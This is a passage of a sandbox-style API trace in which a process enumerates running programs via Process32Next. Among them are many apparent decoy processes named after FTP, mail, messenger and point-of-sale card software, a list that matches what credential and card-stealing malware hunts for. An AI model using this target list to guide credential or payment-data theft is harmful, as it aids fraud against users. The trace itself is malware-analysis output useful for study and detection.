lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0180.409] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.411] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0180.412] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0180.414] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0180.416] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0180.417] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0180.419] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0180.421] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.423] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.424] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0180.426] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.428] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.429] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.431] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0180.433] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0180.434] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0180.436] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0180.476] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0180.478] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0180.479] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0180.481] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0180.483] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0180.484] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0180.486] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0180.487] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0180.489] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0180.490] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0180.492] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0180.493] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0180.495] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0180.496] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0180.498] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0180.500] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0180.502] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0180.503] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0180.505] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0180.508] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0180.560] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0180.563] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0180.564] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0180.566] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0180.568] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0180.570] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0180.572] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0180.574] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0180.576] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0180.578] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0180.580] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0180.582] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0180.584] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0180.586] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0180.588] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0180.589] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0180.591] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0180.593] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0180.657] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0180.659] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0180.661] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0180.663] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0180.666] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0180.668] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0180.669] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0180.671] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0180.673] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0180.675] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0180.678] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0180.679] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0180.681] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0180.683] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0180.684] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0180.686] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0180.688] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0180.690] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0180.692] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0180.762] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0180.764] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0180.765] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0180.767] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0180.769] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0180.770] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.772] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.774] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, 